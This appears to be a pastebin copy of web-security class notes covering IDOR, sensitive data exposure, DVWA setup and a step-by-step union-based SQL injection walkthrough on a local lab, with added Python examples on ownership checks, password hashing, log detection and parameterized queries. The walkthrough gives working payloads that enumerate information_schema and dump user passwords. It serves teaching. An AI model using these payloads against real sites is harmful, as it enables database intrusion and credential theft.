viprajput

session10

Jun 18th, 2018
SESSION 10
==========

METHODS USED IN WEB APPLICATIONS
================================
1. GET - Requests data from a specified resource. The parameters travel in the URL query string, so everything the web application UI sends to its server or database is visible in the address bar, browser history and server logs; this is why the method is considered unsecure for sensitive values.
eg. php?id=1, ?cat=54, ?test=query.

2. POST - Sends the parameters in the request body rather than in the URL, so they are not shown in the address bar or logs when data is requested from the database or server. eg. twitter.com/login.php

----------------------------------------------------------

INSECURE DIRECT OBJECT REFERENCE
================================
A direct object reference occurs when a developer exposes a reference to an internal implementation object such as a file, directory or a database key. Without an access control check or other protection, attackers can directly access unsecured files, configurations and settings that the administrator never authorized or validated for them.

For eg. :

CHJM Website :

Accessing another user's account -
www.chjm.org/login/.../php?id=1411 (ALEX)
www.chjm.org/login/../php?id=1411 (entered into Logan's account)


Accessing pages which a basic user is not authorized to see -
www.chjm.org/user/../settings/config.html

www.chjm.org/login/../php?id=logan/settings/config.html

EG : arvindsharma.com > Login
arvindsharma.com/account/login.php
arvindsharma.com/account/user.php?id=1337

URL > arvindsharma.com
/account/ > folder
user.php > code

1337 > Sanjeev Multani
Kshitij > 1111 > 1337 > Sanjeev's account (Kshitij, whose own id is 1111, changes the id parameter to 1337 and lands in Sanjeev's account)
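As an added example (not part of the original notes), the id-switching from the arvindsharma.com walkthrough in code: a handler that trusts ?id= directly, beside one that checks ownership, and a per-session reference map that hands the client random tokens instead of database keys. The account records, owner names and the Forbidden class are constructed for the example and are not from any real site.

```python
import secrets

# Constructed sample records (not from the notes); the ids echo the 1111/1337 example.
ACCOUNTS = {
    1111: {"owner": "kshitij", "balance": 500},
    1337: {"owner": "sanjeev", "balance": 9000},
}


class Forbidden(Exception):
    """Raised when the session user is not authorized for the requested object."""


def get_account_vulnerable(session_user, account_id):
    # Direct object reference with no access control check: any logged-in user
    # who changes ?id=1111 to ?id=1337 in the URL gets Sanjeev's record.
    return ACCOUNTS[account_id]


def get_account_safe(session_user, account_id):
    # Resolve the reference, then verify that the caller owns the object.
    record = ACCOUNTS.get(account_id)
    if record is None or record["owner"] != session_user:
        # One response for "does not exist" and "not yours", so a caller cannot
        # tell valid ids from invalid ones by the error they get back.
        raise Forbidden(f"{session_user} may not access account {account_id}")
    return record


class ReferenceMap:
    """Indirect object references: the client only ever sees random per-session
    tokens for objects it is allowed to reach; database keys never leave the server."""

    def __init__(self, session_user):
        self.session_user = session_user
        self._by_token = {}
        for account_id, record in ACCOUNTS.items():
            if record["owner"] == session_user:
                self._by_token[secrets.token_urlsafe(8)] = account_id

    def tokens(self):
        """Tokens to embed in this session's links and forms."""
        return list(self._by_token)

    def resolve(self, token):
        account_id = self._by_token.get(token)
        if account_id is None:
            raise Forbidden("unknown object reference")
        # Defense in depth: still run the ownership check on the resolved key.
        return get_account_safe(self.session_user, account_id)


if __name__ == "__main__":
    print("vulnerable:", get_account_vulnerable("kshitij", 1337))  # Sanjeev's record
    try:
        get_account_safe("kshitij", 1337)
    except Forbidden as err:
        print("safe:", err)
```

The ownership check is the fix the OWASP text calls for; the reference map is the extra layer that also stops users from learning how many accounts exist by counting ids.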


----------------------------------------------------------

SENSITIVE DATA EXPOSURE
=======================
Many web applications do not properly protect sensitive data such as names, IDs, credit card details, authentication credentials etc. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft or other crimes. Encryption matters for this data: if it is stored or transmitted in plain text, it is far easier for an attacker or any other individual to obtain it.

Types of Sensitive Data
=======================

1. Personal - Names, addresses, contact numbers etc.
2. Confidential - IDs, passwords (credentials), Aadhaar No.
3. Financial - Bank account numbers, credit cards, debit cards etc.
4. Health Information - Policies etc.
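As an added example (not from the notes), the two storage choices the section contrasts for the "Confidential" and "Financial" categories: a credential kept in plain text beside one kept as a salted, slow hash, plus card-number masking for display and logs. For passwords the right protection is a salted slow hash rather than reversible encryption, since the application never needs the password back. The record layout, the ITERATIONS value and the function names are assumptions made for the example.

```python
import hashlib
import hmac
import os
import re

ITERATIONS = 200_000  # PBKDF2 work factor; assumption for this example, raise it as hardware allows


def hash_password(password, salt=None):
    """Salted, slow hash. A fresh random salt per record means two users with
    the same password still get different stored values."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return "pbkdf2_sha256${}${}${}".format(ITERATIONS, salt.hex(), digest.hex())


def verify_password(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    try:
        algo, iterations, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False  # malformed record
    if algo != "pbkdf2_sha256":
        return False
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


def store_plaintext(user, password):
    # What the section warns about: anyone who obtains the table reads the password.
    return {"user": user, "password": password}


def store_hashed(user, password):
    # Only the salted hash is kept; the password itself cannot be read back.
    return {"user": user, "password": hash_password(password)}


def mask_card_number(pan):
    """Keep only the last four digits for display or logging (data minimisation)."""
    digits = re.sub(r"\D", "", pan)
    if len(digits) < 4:
        return "*" * len(digits)
    return "*" * (len(digits) - 4) + digits[-4:]


if __name__ == "__main__":
    print(store_plaintext("alice", "correct horse"))
    print(store_hashed("alice", "correct horse"))
    print(mask_card_number("4111 1111 1111 1111"))  # constructed test number
```

Full card numbers that must be kept (for example for recurring billing) belong in encrypted storage with the key held outside the database; the masking function is for every place the number is merely shown.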

Demonstration on LVS.


----------------------------------------------------------

DVWA SETUP AND CONFIGURATION
============================
DVWA stands for Damn Vulnerable Web Application. It is a PHP/MySQL web application built, like LVS, for hands-on learning of the OWASP Top 10.

STEPS
=====
Copy the zip file into C:\xampp\htdocs
Right click the zip file, click on "Extract here"
Start the XAMPP control panel, then start Apache and MySQL
Go to the dvwa directory inside "htdocs", navigate to the config folder, open the config.php file and set password="" (empty).
Open the browser, go to 127.0.0.1/dvwa
It will show you a message "Click here to create the Database".
After clicking, your database has been created; "127.0.0.1/phpmyadmin" lists all the databases.
Go through the instruction page of LVS and then start learning through it.

----------------------------------------------------------

OWASP A1. INJECTIONS
=====================

UNION BASED SQL INJECTION
=========================
UNION BASED SQLI is an attack vector in which an attacker enters SQL syntax into an input field of a web application UI and is thereby able to communicate with and access the database.
The attacker extracts data by submitting SQL queries through the web application UI and so reaches the "juicy" data: Database -> Tables -> Columns -> Rows.

TERMINOLOGIES
=============
1. Information Schema : Holds the metadata for every database, table, column and every other detail of the database server. It is considered the mother of information in the database.
2. --+ : In MySQL, "-- " (two dashes followed by a space) starts a comment; the "+" is URL-decoded to that space, so everything after --+ in the original query is ignored and only the injected part is executed.
3. # : Everything entered after # is a comment and is not considered. In a URL it has to be sent encoded as %23; a raw # starts the fragment and never reaches the server.
4. database() - name of the current database.
5. version() - version of the database server.

Target - http://127.0.0.1/dvwa/vulnerabilities/sqli/

Note - For SQLi it is recommended to use Firefox, because special symbols and spaces typed in the address bar are not converted into URL encoding (a "+" is sent as a space, so --+ reaches the server as "-- ").
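As an added example that is not part of the notes: what the web server actually receives for URLs like the ones in this session, and a small log check built on that. Python's urllib decodes the query string the same way the server does (%27 becomes the quote and + becomes a space, which is why --+ works), and scan_log flags parameter values containing the probes this session uses. The access-log lines, the REQUEST_RE and PROBE_RE patterns and the helper names are constructed for the example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache-style access-log lines (not from the notes): the id parameter
# sent plain, then with a quote, then the order-by and union probes, once
# percent-encoded and once raw.
LOG_LINES = [
    '10.0.0.5 - - [18/Jun/2018:10:01:02 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4021',
    '10.0.0.5 - - [18/Jun/2018:10:01:09 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27&Submit=Submit HTTP/1.1" 200 4310',
    '10.0.0.5 - - [18/Jun/2018:10:01:31 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27+order+by+3--+&Submit=Submit HTTP/1.1" 200 4298',
    '10.0.0.5 - - [18/Jun/2018:10:02:04 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1\'+union+select+1,version()--+&Submit=Submit HTTP/1.1" 200 4402',
]

# Request line inside the common log format: "METHOD /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')

# A quote that closes the string literal followed by a SQL keyword, a trailing
# MySQL comment marker, or the metadata calls and table used in the session.
PROBE_RE = re.compile(
    r"'\s*(?:order\s+by|union\s+(?:all\s+)?select|and|or)\b"
    r"|--\s*$"
    r"|\b(?:version|database)\(\)"
    r"|information_schema",
    re.IGNORECASE,
)


def decode_query(request_path):
    """Return the query parameters as the server sees them: %27 -> ', + -> space."""
    return dict(parse_qsl(urlsplit(request_path).query, keep_blank_values=True))


def scan_log(lines):
    """Flag requests whose decoded parameter values look like SQL injection probes."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        for name, value in decode_query(match.group(1)).items():
            probe = PROBE_RE.search(value)
            if probe:
                hits.append({"line": number, "param": name, "value": value, "matched": probe.group(0)})
    return hits


if __name__ == "__main__":
    for hit in scan_log(LOG_LINES):
        print(hit)
```

A bare quote (line 2 above) is deliberately not flagged on its own, because it also occurs in legitimate input such as names; in a real deployment the pattern list is tuned and the check sits in a WAF or log pipeline. Note that the trailing # in the notes' URLs never appears in the log, since the browser treats it as a fragment and does not send it.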

STEPS
======

Step 1: Find the GET method/parameter
eg. php?id=1
?cat=24
?test=query
Try clicking each and every possible link, or give inputs to the search boxes, and look for a GET parameter in the URL.

"http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1&Submit=Submit#"


Step 2: Check whether the site is vulnerable to Union Based SQLI
?id=1'
php?id=1'
If we get a database error, the website is vulnerable to Union Based SQLI.

It will give - "http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1' &Submit=Submit#
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1 "


Step 3: Find the number of columns in the query
order by 100--+
order by 200--+
order by 300--+
Adjust the number until we get the error "Unknown column 'N' in 'order clause'"; the largest number that does not error is the column count.

Eg. 127.0.0.1/dv18/vulnerabilities/sqli/?id=1' order by 1--+&Submit=Submit#
127.0.0.1/dv18/vulnerabilities/sqli/?id=1' order by 2--+&Submit=Submit#
127.0.0.1/dv18/vulnerabilities/sqli/?id=1' order by 3--+&Submit=Submit#
Unknown column '3' in 'order clause'


Step 4: UNION SELECT the number of columns found in step 3; the numbers that show up on the page mark the columns that are displayed, i.e. the ones usable for extraction
union select 1,2--+

http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1' union select 1,2--+ &Submit=Submit#


Step 5: Extracting information from the database
- database()
- version()
- union select version(),2--+
- union select 1,version()--+

- union select all 1,version()--+ : 10.1.25-MariaDB
- union select all 1,database()--+ : dvwa

Step 6: Calling the mother of the database - information_schema

= Extracting table names
- union select all 1,table_name from information_schema.tables--+

http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1' union select all 1,table_name from information_schema.tables--+&Submit=Submit#

= After selecting a juicy table, extracting the column names of that table :
- column_name, information_schema.columns

- union select all 1,column_name from information_schema.columns where table_name="users"--+

= To get the data from the columns (user, password)

- union select user,password from users--+
- http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1' union select group_concat(user,0x0a,password),2 from users--+

And we will get the juicy data.
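As an added example (not part of the original notes), the two query styles behind this whole walkthrough side by side: the DVWA-style string splicing that steps 2 to 6 rely on, and the parameterized query that stops every one of them. It uses Python's sqlite3 on a constructed in-memory users table so it runs offline; sqlite_master stands in for information_schema, the column names and password placeholders are assumptions, and the functions build_db, lookup_vulnerable, lookup_safe, quote_causes_error, count_columns and union_rows are mine, not DVWA's code.

```python
import sqlite3


def build_db():
    """Constructed in-memory stand-in for the DVWA users table (assumed layout)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER PRIMARY KEY, first_name TEXT, user TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?, ?)",
        [(1, "Admin", "admin", "<hash-1>"), (2, "Gordon", "gordonb", "<hash-2>")],
    )
    return conn


def lookup_vulnerable(conn, user_id):
    # The parameter is spliced into the SQL text: a quote in the input closes
    # the string literal and whatever follows is executed as SQL.
    sql = "SELECT first_name, user FROM users WHERE user_id = '%s'" % user_id
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_id):
    # Parameterized query: the value is bound separately from the statement,
    # so it can never change the statement's structure.
    sql = "SELECT first_name, user FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


def quote_causes_error(conn, lookup):
    """Step 2 from the notes: does a lone quote produce a database error?"""
    try:
        lookup(conn, "1'")
        return False
    except sqlite3.OperationalError:
        return True


def count_columns(conn, lookup, limit=20):
    """Step 3 from the notes: raise the ORDER BY index until the engine errors.
    Returns the column count, or None if no probe ever produced an error."""
    for n in range(1, limit + 1):
        try:
            lookup(conn, "1' order by %d-- " % n)
        except sqlite3.OperationalError:
            return n - 1
    return None


def union_rows(conn, lookup, payload):
    """Steps 4-6 from the notes: a UNION appends extra rows to the legitimate result."""
    return lookup(conn, "1' union select %s-- " % payload)


if __name__ == "__main__":
    db = build_db()
    print("quote error, vulnerable:", quote_causes_error(db, lookup_vulnerable))
    print("quote error, safe:", quote_causes_error(db, lookup_safe))
    print("columns:", count_columns(db, lookup_vulnerable))
    print("tables:", union_rows(db, lookup_vulnerable, "name, sql from sqlite_master"))
    print("safe:", union_rows(db, lookup_safe, "user, password from users"))
```

Against lookup_safe every probe is just a string that matches no user_id: no syntax error in step 2, no ORDER BY failure in step 3 and an empty result for the UNION, which is exactly what a fixed DVWA "impossible" level shows. The error messages the notes rely on in steps 2 and 3 are also why production applications should log database errors rather than echo them to the page.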

-------------------------------------------------------------------------------

TESTING WEBSITES
================
1. http://demo.testfire.net/
2. http://testphp.vulnweb.com/


TASKS
=====
1. What is the meaning of % in a URL?
2. What is WAF?